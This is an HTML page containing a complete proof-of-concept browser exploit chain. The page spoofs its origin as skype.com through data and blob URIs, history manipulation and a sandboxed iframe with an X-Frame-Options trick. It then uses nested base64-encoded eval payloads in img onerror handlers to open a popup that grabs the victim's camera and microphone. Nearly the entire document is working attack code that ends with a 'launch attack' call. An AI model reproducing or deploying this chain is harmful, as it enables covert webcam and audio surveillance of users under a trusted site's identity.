
<html>
	<head>
		<meta charset="UTF-8">
		<title></title>
	</head>
	<body>
		
		<script>
		
//		Step 1) Open evil website
//		Step 2) Become a Data URI
//		Step 3) Become a Blob URI
//		Step 4) Manipulate history to change URI
//		Step 5) Create an about:blank iframe and write to it
//		Step 6) Dynamically add a sandbox to this iframe
//		Step 7) Attempt an impossible frame navigation b/c X-Frame-Options
//		Step 8) From within the Iframe, open a new popup and write to it
//		Step 9) Profit


		function hackCamera(){			

			document.body.innerHTML='<video style="margin:0; border: 0; width: 100%; height: 100%" autoplay playsinline></video>';
			
			const constraints = window.constraints = {
				audio: true,
				video: true
			};
			
			async function init() {
				try {
					const stream = await navigator.mediaDevices.getUserMedia(constraints);
					handleSuccess(stream);
				} catch (e) {
					console.log(e);
				}
			}
			
			function handleSuccess(stream) {
					const video = document.querySelector('video');
					const videoTracks = stream.getVideoTracks();
					window.stream = stream; // make variable available to browser console
					video.srcObject = stream;
			}

			init();
				
		}

		function createPopupButton(html,target){
			document.body.innerHTML=`<button style="margin:0; border: 0; width: 100%; height: 100%" onclick='w=window.open("about:blank","_blank");w.document.write(${JSON.stringify(html)});top.close();'><h1 style="font-size:50px;">Click to hack your webcam!</h1><br><span style="font-size:30px;">Make sure your browser trusts <i>${target}</i></span></button>`;
		}

		function createIframe(html){
			document.body.innerHTML='<iframe style="margin:0; border: 0; width: 100%; height: 100%" id="theIframe" src="about:blank"></iframe>';
			document.getElementById('theIframe').contentDocument.write(html); // to give it your href
			document.getElementById('theIframe').sandbox = 'allow-scripts allow-popups allow-popups-to-escape-sandbox'; // dynamically add sandbox
			document.getElementById('theIframe').contentDocument.location = 'https://mock.bugpoc.ninja/?headers=%7B%22X-Frame-Options%22%3A%20%22deny%22%7D'; // attempt impossible X-Frame-Options navigation to trigger a sandbox flag update
		}
		
		function setDomain(domain){
            // history change must occur in two steps
			history.replaceState('','','blob://');
			history.replaceState('','',domain);
		}
		
		function openBlob(html){
			blob = new Blob([html], {type: 'text/html'});
			url = URL.createObjectURL(blob);
			location.replace(url); // important to get "blank" :// origin
		}

		function openData(html){
			window.open('data:text/html,'+html,'_self');
		}
		
		</script>
		<script>
		
		targetDomain = 'skype.com';
				
		// ----- PAYLOAD #1 ------
		
		// goes in the popup
		
		script = hackCamera.toString() + `hackCamera();`
		encodedScript = window.btoa(script);
		payload1 = `<img src=x onerror=window.eval(window.atob("${encodedScript}"))>`;
		
		// ----- PAYLOAD #2 ------

		// goes in the iframe
		
		script = createPopupButton.toString() + `createPopupButton(${JSON.stringify(payload1)},${JSON.stringify(targetDomain)});`
		encodedScript = window.btoa(script);
		payload2 = `<img src=x onerror=window.eval(window.atob("${encodedScript}"))>`;
			
		// ----- PAYLOAD #3 ------
		
		// goes in the blob
		
		script = setDomain.toString() + `setDomain("${targetDomain}");`
		script += createIframe.toString() + `createIframe(${JSON.stringify(payload2)});`;
		encodedScript = window.btoa(script);
		payload3 = `<img src=x onerror=window.eval(window.atob("${encodedScript}"))>`;
		
		// ----- PAYLOAD #4 ------
		
		// goes in the data
		
		script = openBlob.toString() + `openBlob(${JSON.stringify(payload3)});`
		encodedScript = window.btoa(script);
		payload4 = `<img src=x onerror=window.eval(window.atob("${encodedScript}"))>`;
		
		
		// launch attack
		openData(payload4);
		
		
		</script>
	</body>
</html>